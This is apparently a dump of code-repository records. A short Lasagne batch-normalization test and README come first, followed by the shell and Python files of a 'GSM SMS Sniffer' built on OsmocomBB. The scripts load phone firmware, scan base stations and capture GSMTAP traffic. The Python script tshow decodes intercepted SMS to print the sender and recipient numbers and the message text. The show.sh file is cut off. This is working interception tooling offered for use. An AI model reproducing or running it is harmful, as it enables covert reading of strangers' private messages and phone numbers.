np.random.randn(100,3,32,32).astype(np.float32)\n Xout = fn(Xin)\n assert Xout.shape == (100,16,32,32)\n\n\ndef test_batchnormalization_backward():\n input_var = T.tensor4('inputs')\n\n network = simple_network(input_var)\n\n output = lasagne.layers.get_output(network)\n\n loss = T.sum(output**2)\n params = lasagne.layers.get_all_params(network, trainable=True)\n updates = lasagne.updates.sgd(loss, params, 1)\n\n fn = theano.function([input_var], output, updates=updates)\n\n Xin = np.random.randn(100,3,32,32).astype(np.float32)\n Xout = fn(Xin)\n assert Xout.shape == (100,16,32,32)\n"
},
{
"alpha_fraction": 0.6991150379180908,
"alphanum_fraction": 0.7179203629493713,
"avg_line_length": 38.30434799194336,
"blob_id": "fa075507d4562fabf8d3ab4c99e6afe348e06646",
"content_id": "3465ceddacab69b6f665b54677db4a6139214151",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 904,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 23,
"path": "/README.md",
"repo_name": "jureso/BatchNormalizationCUDNN",
"src_encoding": "UTF-8",
"text": "# Batch Normalization using CUDNN in Lasagne\n\nThis module reimplements Lasagne version of \n[Batch normalization](http://lasagne.readthedocs.io/en/latest/modules/layers/normalization.html#lasagne.layers.BatchNormLayer) \nso that it uses the CUDNNv5 implementation.\n \nSee **batchnormalization.py** for details.\n\n## Usage\n\n```python\nimport lasagne\nfrom lasagne.layers.dnn import Conv2DDNNLayer as ConvLayer\nfrom batchnormalization import BatchNormLayer\n\nl_in = lasagne.layers.InputLayer(shape=(None, 3, 32, 32), input_var=input_var)\nl_conv1 = ConvLayer(l_in, num_filters=16, filter_size=(3, 3), stride=(1, 1), nonlinearity=None,\n pad='same',\n W=lasagne.init.HeNormal(gain='relu'), flip_filters=False, b=None)\n\nl_bn1 = BatchNormLayer(l_conv1)\nl_relu = lasagne.layers.NonlinearityLayer(l_bn1, nonlinearity=lasagne.nonlinearities.rectify)\n```\n"
}
] | 3 |
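The layer in this repo tracks its inference-time statistics with an exponential moving average controlled by alpha (the `default_update` expressions on `mean`, `inv_std`, and `var`). A small NumPy sketch of that update rule, independent of Theano (the toy data and variable names are illustrative, not from the repo):

```python
import numpy as np

alpha, epsilon = 0.1, 1e-4
running_mean, running_var = 0.0, 1.0

for _ in range(100):
    batch = np.random.randn(256) * 2.0 + 5.0   # toy batch: true mean 5, true var 4
    m, v = batch.mean(), batch.var()
    # Same form as the layer's default_update: new = (1 - alpha)*old + alpha*batch_stat
    running_mean = (1 - alpha) * running_mean + alpha * m
    running_var = (1 - alpha) * running_var + alpha * v

inv_std = 1.0 / np.sqrt(running_var + epsilon)
print(running_mean, running_var, inv_std)   # -> roughly 5, 4, 0.5
```

Smaller alpha values average over more batches and give smoother inference statistics, at the cost of adapting more slowly early in training.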
hngbyr/gsm
|
https://github.com/hngbyr/gsm
|
5d2cf3353fe605a9b0155066a5d93a63a0bbc4ed
|
cb76232f78a596338191ebb1045e80d50e28a4a5
|
89281e284351465fa9d08cc27fc42c380d21ca7e
|
refs/heads/master
| 2020-12-24T15:58:35.017390 | 2015-04-06T16:47:38 | 2015-04-06T16:47:38 | 33,492,564 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5856188535690308,
"alphanum_fraction": 0.6072432994842529,
"avg_line_length": 35.93506622314453,
"blob_id": "3c9585c6d54b5e5a02dd1576399ad975ebd21bb2",
"content_id": "378f7d9f8c5a5a199427cd2632e1d6ce066045c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 6208,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 154,
"path": "/bin/gsm.sh",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nCONFIG=\"$HOME/.ini/config.ini\";\nif [ ! -f $CONFIG ];then\nzenity --info --text=\"错误代码0x05\" --title=\"配置文件错误\";\n echo \"error code 0x05,Please contact the system administrator!\";\n exit 1;\nfi\nGSMPATH=`cat \"$CONFIG\" | grep '^GSMPATH=' | cut -d '=' -f 2`;\nGSMAPPATH=`cat \"$CONFIG\" | grep '^GSMAPATH=' | cut -d '=' -f 2`;\nGSMNUM=`cat \"$CONFIG\" | grep '^GSMNUM=' | cut -d '=' -f 2`;\nMOBILE=`cat \"$CONFIG\" | grep '^MOBILE=' | cut -d '=' -f 2`;\nGSMDEFSESSION=`cat \"$CONFIG\" | grep '^GSMDEFSESSION=' | cut -d '=' -f 2`;\nGSMSESSION=`cat \"$CONFIG\" | grep '^GSMSESSION=' | cut -d '=' -f 2`;\nGSMBRMBORACTL=`cat \"$CONFIG\" | grep '^GSMBRMBORACTL=' | cut -d '=' -f 2`;\nnetwork_name=`cat \"$CONFIG\" | grep '^GSMLOCALHOST=' | cut -d '=' -f 2`;\nGSMKRAKENHOST=`cat \"$CONFIG\" | grep '^GSMKRAKENHOST=' | cut -d '=' -f 2`;\nGSMNAPALMEXCOCODE=`cat \"$CONFIG\" | grep '^GSMNAPALMEXCOCODE=' | cut -d '=' -f 2`;\nphone=`cat \"$CONFIG\" | grep '^MOBILE=' | cut -d '=' -f 2`;\nGSMPACHER=`cat \"$CONFIG\" | wc -l`;\nnum=`lsusb |grep FT232 | wc -l`;\n# 检查配置文件\nif [ \"$num\" = \"0\" ];then\n\tzenity --warning --text=\"没有发现硬件[Error code:0x0e]\" --title=\"AC-GSM 0x0e\" --ok-label=\"退出\";\nexit\nfi\nif [ \"$GSMNAPALMEXCOCODE\" -ne \"$GSMPACHER\" ];then\n\tzenity --error --text=\"非注册用户(error code 0x0f)\" --title=\"请注册\" --ok-label=\"关闭\";\n\techo \"error code 0x0f\";\n\texit 1;\nfi\nif [ -z \"$GSMBRMBORACTL\" ]; then\n\tif [ $num -le 3 ];then ##lt< le<= eg=\n\tGSMNUM=$num;\n\telse\n\tGSMNUM=3;\n\tfi\nfi\n\n\nif [ ! -d $GSMSESSION ];then\n\tmkdir -p $GSMSESSION ;\nfi\nsudo=\"\"\n# 检查是否是root用户执行 \nif [ $(id -u) != \"0\" ]; then\n#zenity --error --text=\"非ROOT用户:[Error code:0x00]\" --title=\"非ROOT用户\" --ok-label=\"退出\";\n# echo -e \"Error code 0x00: Run this script using the root user!\\nUsage:sudo bash $0\";\n# exit 1;\nsudo=\"sudo\";\nfi\n# 清理运行环境\nkillall ccch_scan cell_log osmocon 2>/dev/null;\ncd $GSMSESSION && rm -rf *.dat;\n\n#echo $GSMAPPATH\n#sleep 5\n# 检查osmocombb程序\nif [ ! -f $GSMAPPATH/osmocon ];then\n\tzenity --error --text=\"错误代码[Error code:0x01]\" --title=\"AC-GSM 程序错误\" --ok-label=\"退出\";\n\techo \"error code 0x01,Please contact the system administrator!\";\n exit 1\nelif [ ! -f $GSMAPPATH/layer1.compalram.bin ];then\n\tzenity --error --text=\"错误代码[Error code:0x02]\" --title=\"AC-GSM 程序错误\" --ok-label=\"退出\";\n echo \"error code 0x02,Please contact the system administrator!\";\n exit 1;\nelif [ ! -f $GSMAPPATH/cell_log ];then\n\tzenity --error --text=\"错误代码[Error code:0x03]\" --title=\"AC-GSM 程序错误\" --ok-label=\"退出\";\n echo \"error code 0x03,Please contact the system administrator!\";\n exit 1;\nelif [ ! 
-f $GSMAPPATH/ccch_scan ];then\n\tzenity --error --text=\"错误代码[Error code:0x04]\" --title=\"AC-GSM 程序错误\" --ok-label=\"退出\";\n echo \"error code 0x04,Please contact the system administrator!\";\n exit 1\nfi\necho \n#echo 程序路径为:$GSMAPPATH\n\necho \"[-]你是[ $GSMNUM ]信道用户,检测到通道数量:[ $num ] \";\necho \"[-]你是[ $GSMNUM ]信道用户!\";\ni=0\necho\nCell_log()\n{\n#\techo \"DBG: $GSMAPPATH/cell_log -s /tmp/osmocom_l2_$i -l - 2>&1 | bash $GSMPATH/cell_log.sh $cell_num | tee \"$GSMSESSION\"/scan.current\";\n\t$sudo $GSMAPPATH/cell_log -s /tmp/osmocom_l2_$i -l - 2>&1 | bash $GSMPATH/cell_log.sh $cell_num | tee \"$GSMSESSION\"/scan.current\necho \"PID: $$\"\n}\n\nwhile [ $i -lt $GSMNUM ];do\n\tserial=\"/dev/ttyUSB$i\";\n\techo \"[*]开始对第【$((i+1))/$GSMNUM 】信道启动和设置------------\";\n\techo \"[*]加载信道【$((i+1)) 】固件,打开电源按红色按钮...\";\n#\techo \"DBG: $GSMPATH/motoload.sh $phone $serial /tmp/osmocom_l2_$i /tmp/osmocom_loader_$i\";\n\t$sudo $GSMPATH/motoload.sh $phone $serial /tmp/osmocom_l2_$i /tmp/osmocom_loader_$i > /tmp/log_l1_$$_$i 2>&1 &\n\techo \"PID: $$\"\n#\txterm -T \"AC-GSM Channel [ $((i+1)) ] Data Windows\" -e \"$GSMAPPATH\"/osmocon -m c123xor -s \"$GSMDEFSESSION\"/osmocom_l2_$((i+1)) -l \"$GSMDEFSESSION\"/osmocom_loader_$((i+1)) -p /dev/ttyUSB\"$i\" \"$GSMAPPATH\"/layer1.compalram.bin &\n\tifconfig $network_name:$((i+1)) down 2>/dev/null\n\tifconfig $network_name:$((i+1)) $GSMKRAKENHOST$((i+1))\n\tif [ \"$i\" -eq 0 ]; then # backwards compatibility\n\t\trm -f /tmp/osmocom_l2;\n\t\tln -s /tmp/osmocom_l2_0 /tmp/osmocom_l2;\n\t\trm -f /tmp/osmocom_loader;\n\t\tln -s /tmp/osmocom_loader_0 /tmp/osmocom_loader;\n\tfi\n\tread -p \"[*]信道启动完成?(Y/N)\";\n\tif [ -z $arfcn_num ] ;then\n\t\tread -p \"[!]是否需要扫描频段Arfcn[默认回车:是]:\" abc\n\t\tif [ -z $abc ];then\n\t\t\tif [ -z $arfcn_num ];then\n\t\t\tread -p \"[!]输入扫描频段显示数量[默认回车:all]:\" cell_num;\n\t\t\t\tif [ X\"$cell_num\" == X\"\" ];then\n\t\t\t\tcell_numl=\"\"\n\t\t\t\tfi\n\t\t\tfi\n\t\tCell_log\n\t\tfi\n\tfi\n#\t\txterm -T \"AC-GSM Channel [ $((i+1)) ] Cell Windows\" -e $GSMAPPATH/cell_log -s $GSMDEFSESSION/osmocom_l2_$((i+1)) 2>/dev/null &\n\t#sleep 1;\n#\tif [ ! -z \"${array[@]:0}\" ] ;then\n#\techo \"已经扫描的频段ARFCN: ${array[@]:0} \"\n#\tfi\n\tread -p \"[*]请输入频段ARFCN:\" arfcn_num;\n#echo `stty -F /dev/ttyUSB0`\n\techo -e '\\n';\n\tarray[i]=\"$arfcn_num \";\n#echo \"DBG:xterm -T \"AC-GSM Channel [ $((i+1)) ] Scan Windows\" -e \"$GSMAPPATH\"/ccch_scan -s \"$GSMDEFSESSION\"/osmocom_l2_$i -i \"$GSMKRAKENHOST\"\"$((i+1))\" -a \"$arfcn_num\" \"\n\t$sudo xterm -T \"AC-GSM Channel [ $((i+1)) ] Scan Windows\" -e \"$GSMAPPATH\"/ccch_scan -s \"$GSMDEFSESSION\"/osmocom_l2_$i -i \"$GSMKRAKENHOST\"\"$((i+1))\" -a \"$arfcn_num\" &\n\ti=$((i+1));\n#echo `stty -F /dev/ttyUSB0`\nsleep 1\narfcn_num=\"\"\ndone\nread -p \"[!]是否窗口显示[默认回车:是]:\" YN\n\tif [ X\"$YN\" == X\"\" ];then\n\tsudo $GSMPATH/wireshark.sh &\n\tfi\nclear\n#time=`echo `date +%Y/%m/%d` `date +%H:%M``;\nLOGFILE=`date +%m%d%H%M`;\n\necho \"........................................\";\n#echo 程序路径为:$GSMAPPATH\necho \"[+]信道数量:$GSMNUM\";\necho [*]开始时间:`date +%Y/%m/%d` `date +%H:%M`;\n#echo \"[*]开始时间:$time\";\necho \"[*]ARFCN : ${array[@]:0}\";\necho \"[-]Press 'Ctrl+C' 关闭全部程序!.\";\necho \"[*]收到的信息稍后会显示在下面,并有铃声提醒.\";\necho \"........................................\";\n$sudo bash \"$GSMPATH\"/show.sh | tee \"$GSMAPPATH\"/\"$LOGFILE\".current;\nrm -rf $GSMDEFSESSION/osmocom* $GSMSESSION;\n#sudo $GSMPATH/wireshark.sh\nread IGNORE\n"
},
{
"alpha_fraction": 0.35534048080444336,
"alphanum_fraction": 0.3842032551765442,
"avg_line_length": 50.89237594604492,
"blob_id": "960634c0ed9684ec231ff875855c99dc043d4dbc",
"content_id": "19a8cab4a3657cfba35e879e4652e3ed576c657c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11628,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 223,
"path": "/bin/tshow",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#coding:utf-8\n#========================================================\n#命令模式显示GSM内容 2015-02-04 12:46:28 \n#使用方法:先把所有信道启动好,然后运行:python smshack.py\n#==========================================================\n\nimport socket\nimport struct\nimport threading\nimport Queue\nimport time\nimport os\n\ndef covert_cellphone_num(num):\n phone_number = []\n for i in num:\n i = ord(i)\n i = (i << 4 & 0xF0) + (i >> 4 & 0x0F)\n phone_number.append(chr(i))\n\n return (\"\".join(phone_number).encode('hex'))[:-1]\n\ndef handle_message(**kargs):\n gsm_sms_segs = \"\"\n while True:\n data = kargs['messages'].get(True)\n if data[0:2] == '\\x02\\x04': #GSM_TAP header Version02 & HeaderLength 16bytes\n\n address_field = struct.unpack('B', data[16:17])[0]\n control_field = struct.unpack('B', data[17:18])[0]\n length_field = struct.unpack('B', data[18:19])[0]\n\n if (address_field >> 2) & 0x1F == 3: # GSM SMS\n if (control_field & 0x01) == 0x00: # frame type == information frame\n # caculate segments data length\n seg_len = (length_field >> 2) & 0x3F\n # if there are more segments\n has_segments = ((length_field >> 1) & 0x01 == 0x1)\n # caculate segments sequence\n# seq = (control_field >> 1) & 0x07\n\n gsm_sms_segs += data[19:19+seg_len]\n\n # reassemble all segments when handling the last packet\n if has_segments == False:\n\n gsm_sms = gsm_sms_segs\n gsm_sms_segs = \"\"\n\n to_number = \"\"\n from_number = \"\"\n to_number_len = 0\n from_number_len = 0\n is_sms_submit = False\n is_sms_deliver = False\n has_tpudhi = False\n has_tpvpf = False\n is_mms = False\n\n if (len(gsm_sms) > 10 and ord(gsm_sms[0:1]) & 0x0F == 0x09) and (ord(gsm_sms[1:2]) == 0x01) and (ord(gsm_sms[2:3]) > 0x10): # SMS Message\n\n#\t\t\t\t\tf_object=open('/home/gsm/bin/sms.t','a') #abc\n try:\n #print gsm_sms.encode('hex') //hoho\n # determinate if this is uplink message aka MS to Network\n is_uplink = (ord(gsm_sms[3:4]) == 0x00)\n #print (\"Type: SUBMIT\" if is_uplink else \"Type: DELIVER\")\n\n if is_uplink:\n to_number_len = struct.unpack('B', gsm_sms[6:7])[0] - 1\n to_number = gsm_sms[8:8+to_number_len]\n to_number = covert_cellphone_num(to_number)\n\n # check if this is SMS-SUBMIT\n sms_submit = struct.unpack('B', gsm_sms[7+to_number_len+2:7+to_number_len+2+1])[0]\n if sms_submit & 0x03 == 0x01:\n is_sms_submit = True\n # check if TP UD includes a extra header\n has_tpudhi = ((struct.unpack('B', gsm_sms[7+to_number_len+2:7+to_number_len+2+1])[0] & 0x40) == 0x40)\n has_tpvpf = ((struct.unpack('B', gsm_sms[7+to_number_len+2:7+to_number_len+2+1])[0] >> 3 & 0x02) == 0x02)\n from_number_len = struct.unpack('B', gsm_sms[8+to_number_len+3:8+to_number_len+3+1])[0]\n from_number_len = (from_number_len / 2) + (from_number_len % 2)\n from_number = gsm_sms[8+to_number_len+3+2:8+to_number_len+3+2+from_number_len]\n from_number = covert_cellphone_num(from_number) \n print '..' 
* 30\n os.system('mplayer -really-quiet a.wav 2>/tmp/a')\n print \"Time:%s From:%s To:%s\" % (GetCurrentDate(),from_number,to_number)\n else:\n to_number_len = struct.unpack('B', gsm_sms[5:6])[0] - 1\n to_number = gsm_sms[7:7+to_number_len]\n to_number = covert_cellphone_num(to_number)\n # check if this is SMS-DELIVER\n sms_deliver = struct.unpack('B', gsm_sms[7+to_number_len+2:7+to_number_len+2+1])[0]\n if sms_deliver & 0x03 == 0x0:\n is_sms_deliver = True\n # check if TP UD includes a extra header\n has_tpudhi = ((struct.unpack('B', gsm_sms[7+to_number_len+2:7+to_number_len+2+1])[0] & 0x40) == 0x40)\n from_number_len = struct.unpack('B', gsm_sms[7+to_number_len+3:7+to_number_len+3+1])[0]\n from_number_len = (from_number_len / 2) + (from_number_len % 2)\n from_number = gsm_sms[7+to_number_len+3+2:7+to_number_len+3+2+from_number_len]\n from_number = covert_cellphone_num(from_number)\n print '..' * 30\n os.system('mplayer -really-quiet a.wav 2>/tmp/a')\n print \"Time:%s From: %s To:%s\" % (GetCurrentDate(),from_number,to_number)\n if is_sms_deliver:\n try:\n # if there is additional header, skip it\n header_len = 0\n if has_tpudhi:\n header_len = struct.unpack('B', gsm_sms[7+to_number_len+3+2+from_number_len+10:7+to_number_len+3+2+from_number_len+10+1])[0]\n\n mms = struct.unpack('B', gsm_sms[7+to_number_len+3+2+from_number_len+1:7+to_number_len+3+2+from_number_len+1+1])[0]\n if ((mms >> 2) & 0x03) == 0x01:\n is_mms = True\n\n if header_len == 0:\n sms = gsm_sms[7+to_number_len+3+2+from_number_len + 10:]\n else:\n sms = gsm_sms[7+to_number_len+3+2+from_number_len + 10 + header_len + 1:]\n #print sms.encode('hex')\n\n # adjust string from big-endian to little-endian\n #sms_len = (len(sms) / 2)\n #sms = struct.unpack((\">\" + \"H\" * sms_len), sms)\n #sms = struct.pack(\"<\" + (\"H\" * sms_len), *sms)\n #print sms.encode('hex')\n\n #SMS is using utf-16 encode\n if not is_mms:\n #Dlink date\n print 'Msg:' + sms.decode('UTF-16BE')\n \t\t\t\t\t\t\t\t\t\n else:\n print \" MMS message.\" \n except:\n print \" Can't Decode The Message\" \n\t\t\t\t\t\t \n elif is_sms_submit:\n try:\n # if there is additional header, skip it\n header_len = 0\n # looks like uplink sms doesn't have a TP service centre time stamp\n if has_tpudhi:\n header_len = struct.unpack('B', gsm_sms[8+to_number_len+3+2+from_number_len+3:8+to_number_len+3+2+from_number_len+3+1])[0]\n\n mms = struct.unpack('B', gsm_sms[8+to_number_len+3+2+from_number_len+1:8+to_number_len+3+2+from_number_len+1+1])[0]\n if ((mms >> 2) & 0x03) == 0x01:\n is_mms = True\n\n if has_tpvpf:\n if header_len == 0:\n sms = gsm_sms[8+to_number_len+3+2+from_number_len + 3 + 1:]\n else:\n sms = gsm_sms[8+to_number_len+3+2+from_number_len + 3 + header_len + 1 + 1:]\n else:\n if header_len == 0:\n sms = gsm_sms[8+to_number_len+3+2+from_number_len + 3:]\n else:\n sms = gsm_sms[8+to_number_len+3+2+from_number_len + 3 + header_len + 1:]\n #print sms.encode('hex')\n\n # adjust string from big-endian to little-endian\n #sms_len = (len(sms) / 2)\n #sms = struct.unpack((\">\" + \"H\" * sms_len), sms)\n #sms = struct.pack(\"<\" + (\"H\" * sms_len), *sms)\n #print sms.encode('hex')\n\n #SMS is using utf-16 encode\n if not is_mms:\n print '[Msg*]:'+sms.decode('UTF-16BE')\n \n else:\n print \" MMS message.\" \n\n except:\n print \" Can't Decode The Message\" \n\n else:\n print \" SMS Status Report. 
\" \n\n except:\n print \" Unexpected packets format.\" \n\n\ndef GetCurrentTime():\n return time.strftime('%Y/%m/%d %H:%M:%S',time.localtime(time.time()))\n\ndef GetCurrentDate():\n\treturn time.strftime('%H:%M:%S',time.localtime(time.time()))\n\nif __name__ == '__main__':\n\n\tprint \"[L]Build by AC-GSM 05/05/2014\"\n\tprint \"[]Press Ctrl+C to Exit.\"\n\ttry:\n\n\t\tq = Queue.Queue()\n\t\tt = threading.Thread(target=handle_message, name=\"handle_message_thread\", kwargs={'messages':q})\n\t\tt.daemon = True\n\t\tt.start()\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n#\t\ts.settimeout(5) \n\t\ts.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) \n# \t\ts.bind(('', UDP_PORT)) \n\t\ts.bind(('127.0.0.1', 4729)) \t\n\t\tprint '=' * 40\n\t\tprint \"[*]%s Start Monitor.\" % GetCurrentTime()\n\t\tprint \"[*]Enjoy GSM Sniffing!\"\n\t\twhile True:\n\n\t\t\tdata, addr = s.recvfrom(2048)\n#\t\t\tprint data.encode('hex')\n\n\t\t\tq.put(data)\n\t\ts.close()\n\n\texcept KeyboardInterrupt:\n\t\ttry:\n\n\t\t\tprint \"Game Over!.\"\n\t\texcept:\n\t\t\tpass\n"
},
{
"alpha_fraction": 0.6033519506454468,
"alphanum_fraction": 0.6089385747909546,
"avg_line_length": 15.272727012634277,
"blob_id": "6b9d0c3a2203644b5b7cc307550df5592075a04c",
"content_id": "f521a8e2231cffe534b7d1de4bbf39a2ef0b87a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 11,
"path": "/bin/run.sh",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# 检查是否是root用户执行 \nsudo=\"\"\nif [ $(id -u) != \"0\" ]; then\nsudo=\"sudo\";\necho -n \"请输入运行密码:\";\nfi\n#echo \"请输入运行密码:\"\n$sudo bash /root/gsm/bin/gsm.sh\n#bash /root/gsm/bin/gsm.sh\n"
},
{
"alpha_fraction": 0.6572580933570862,
"alphanum_fraction": 0.6653226017951965,
"avg_line_length": 23.774999618530273,
"blob_id": "6dd3da5b8654465e1fe201f9b640106453f258b5",
"content_id": "06ad8a7df43a9c71ce49042d460a2af53a3adf31",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1460,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 40,
"path": "/readme.md",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "GSM SMS Sniffer\n===========\n\nGSMSniffer 借助 Osmocom-BB 平台,对2G网络短信嗅探抓取的一个Demo\n实现自动载入系统/扫描基站与抓取短信并存入数据库的过程\n项目公开代码为Python处理部分,完整框架演示可参考:\n\n### 文件说明\n=======\n```\n.\n├── bin(核心代码)\n│ ├── gsm.sh(主程序)\n│ ├── cell_log.sh(调用OsmocomBB扫描基站)\n│ ├── motoload.sh(调用OsmocomBB载入系统)\n│ ├── scan.sh(调用OsmocomBB扫描基站)\n│ ├── show.sh(调用OsmocomBB嗅探基站短信)\n│ ├── wireshark.sh(调用wireshark显示短信)\n├── gsmapp\n│ ├──cell_log (调用OsmocomBB扫描基站)\n│ ├── ccch_scan (调用OsmocomBB嗅探基站短信)\n│ ├── osmocom OsmocomBB载入系统)\n│ └── ini\n│ ├── .config.ini(app 配置文件)\n│ └── .wireshark(wireshark配置文件 Version 1.9.0 (SVN Rev Unknown from unknown))\n└── readme.md(项目说明)\n\n### 工具使用\n解压\n1. 用ln将需要的so文件链接到/usr/lib或者/lib这两个默认的目录下边 \nln -s /home/bin/wrieshark/lib/*.so /usr/lib \nsudo ldconfig \n2. 修改LD_LIBRARY_PATH \nexport LD_LIBRARY_PATH=/home/bin/wrieshark/lib:$LD_LIBRARY_PATH \nsudo ldconfig \n3. 修改/etc/ld.so.conf,然后刷新/etc/ld.so.conf \nvim /etc/ld.so.conf \nadd /home/bin/wrieshark/lib\nsudo ldconfig \n4. 修改 .ini 文件 到 /home/.ini\n\n"
},
{
"alpha_fraction": 0.5185185074806213,
"alphanum_fraction": 0.5475475192070007,
"avg_line_length": 32.84745788574219,
"blob_id": "d6d18392cf2734a263caf1a5b2c8c7065f01c439",
"content_id": "6e91eb4468ffaf2aab8ae74c5e1f1d453180f566",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2114,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 59,
"path": "/bin/cell_log.sh",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# usage: /home/gsm/typhon-vx/osmocom-bb-sylvain-burst_ind/src/host/layer23/src/misc/cell_log -s /tmp/osmocom_l2_1 -l - 2>&1 | bash gsm_parse_cell_log.sh\nCONFIG=\"$HOME/.ini/config.ini\";\nif [ ! -f $CONFIG ];then\nzenity --info --text=\"错误代码0x05\" --title=\"配置文件错误\";\n echo \"error code 0x05,Please contact the system administrator!\";\n exit 1;\nfi\nGSMPATH=`cat \"$CONFIG\" | grep '^GSMPATH=' | cut -d '=' -f 2`;\nGSMNAPALMEXCOCODE=`cat \"$CONFIG\" | grep '^GSMNAPALMEXCOCODE=' | cut -d '=' -f 2`;\nGSMPACHER=`cat \"$CONFIG\" | wc -l`\nif [ \"$GSMNAPALMEXCOCODE\" -ne \"$GSMPACHER\" ];then\n\tzenity --error --text=\"非注册用户(error code 0x0f)\" --title=\"请注册\" --ok-label=\"关闭\";\n\techo \"error code 0x0f\";\n\texit 1;\nfi\n\n###==================================================================\n#maxcells=40\nmaxcells=`cat \"$CONFIG\" | grep '^GSMMAXCELLS=' | cut -d '=' -f 2`;\nif [ $# -eq 1 ]; then\n\tmaxcells=\"$1\"\nfi\n\ncurcells=0\necho \necho -e \" NO. ARFCN 强度 CID 服务商\";\necho \" ------------------------------------------\";\nwhile read line; do\n\tif echo $line|grep -q Cell; then\n\t\top=`echo \"$line\" | cut -d '(' -f 2 | cut -d ')' -f 1`\n\t\tarfcn=`echo \"$line\" | cut -d '=' -f 2 | cut -d ' ' -f 1`\n\t\tmcnc=`echo \"$line\" | sed -re \"s/^.* MCC=([0-9]{3}) MNC=([0-9]{2,3}).*$/\\1\\2/\"`\n\tfi\n\tif echo $line|grep -q \"^rxlev\"; then\n\t\trxlev=`echo \"$line\" | cut -d \" \" -f 2`\n\tfi\n\tif echo $line|grep -q \"^si3\"; then\n\t\tcid=$(printf \"%d\\n\" 0x`echo \"$line\" | cut -c 14,15,17,18`)\n\tfi\n\tif echo $line|grep -q si4; then\n\t\tif [ \"$op\" = \"China, China Unicom\" ];then\n\t\t\tmb=\"联通\"\n\t\telse\n\t\t\tmb=\"移动\"\n\t\tfi\n\t\tstdbuf -oL printf \" %4d> | %3d %4d | %d\" \"$((curcells+1))\" \"$arfcn\" \"$rxlev\" \"$cid\";\n\t\tstdbuf -oL printf \"%5c $mb \\n\";\n#\techo \"$((curcells+1)): $arfcn $rxlev ($mb $mcnc)\"\n#\t\techo \"$op;$mcnc;$arfcn;$cid;$rxlev\"\n\t\tlet curcells++\n\t\tif [ $curcells -ge $maxcells ]; then\n\t\t\t#echo \"[!]已超出默认最大显示数量$maxcells,如需要显示更多,请联系系统管理员!\"\n\t\t\tkillall -TERM cell_log # cell_log does not respond to sigpipe\n\t\t\texit 0\n\t\tfi\n\tfi\ndone\n\n"
},
{
"alpha_fraction": 0.5759637355804443,
"alphanum_fraction": 0.6145124435424805,
"avg_line_length": 30.5,
"blob_id": "7390120e77dc765c51d15eeb282110698cd70a63",
"content_id": "6a19f9e5a72475c343f1d4a5923b2b527a571b4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 475,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 14,
"path": "/bin/wireshark.sh",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nCONFIG=\"$HOME/.ini/config.ini\";\nif [ ! -f $CONFIG ];then\nzenity --info --text=\"错误代码0x05\" --title=\"配置文件错误\";\n echo \"error code 0x05,Please contact the system administrator!\";\n exit 1;\nfi\nWPATH=`cat \"$CONFIG\" | grep '^WHIRESHARK=' | cut -d '=' -f 2`;\nsudo=\"\"\nif [ $(id -u) != \"0\" ]; then\nsudo=\"sudo\";\necho -n \"请输入运行密码:\";\nfi\n$sudo iptables -A INPUT -p UDP --dport 4729 -j DROP && $sudo $WPATH/wireshark -k -i lo -f 'port 4729'\n"
},
{
"alpha_fraction": 0.5192813277244568,
"alphanum_fraction": 0.5376862287521362,
"avg_line_length": 32.55882263183594,
"blob_id": "28242e4872320170d5d7616bd3480d404f64ffef",
"content_id": "884066c55a2c3f636fe0a9c6b4e2c25e16182ed8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2322,
"license_type": "no_license",
"max_line_length": 205,
"num_lines": 68,
"path": "/bin/show.sh",
"repo_name": "hngbyr/gsm",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#sudo /home/gsm/wireshark-master/tshark -l $options -R gsm_sms -T fields -e gsmtap.uplink -e gsm_sms.tp-oa -e gsm_sms.tp-da -e gsm_sms.sms_text -e gsmtap.arfcn -e frame.time -e gsm_a.dtap.cld_party_bcd_num\n# $1 - input file, if empty\nCONFIG=\"$HOME/.ini/config.ini\";\nif [ ! -f $CONFIG ];then\nzenity --info --text=\"错误代码0x05\" --title=\"配置文件错误\";\n echo \"error code 0x05,Please contact the system administrator!\";\n exit 1;\nfi\nTSHPATH=`cat \"$CONFIG\" | grep '^WHIRESHARK=' | cut -d '=' -f 2`;\nGSMPATH=`cat \"$CONFIG\" | grep '^GSMPATH=' | cut -d '=' -f 2`;\nnu=1\nif [ ! -z \"$1\" ]; then\n\toptions=\"-r $1\";\n#\tsudo=\"\";\nelse\n\toptions=\"-i lo\";\n#\tsudo=\"sudo\";\t#ble\nfi\n\n# -e gsm_a.cld_party_bcd_num \n# this seems to be addr of sms gateway... not interesting with downlink\nsudo=\"\"\n# 检查是否是root用户执行 \nif [ $(id -u) != \"0\" ]; then\nsudo=\"sudo\";\nfi\n$sudo $TSHPATH/tshark -l $options -R gsm_sms -T fields \\\n -e gsmtap.uplink -e gsm_sms.tp-oa -e gsm_sms.tp-da\\\n -e 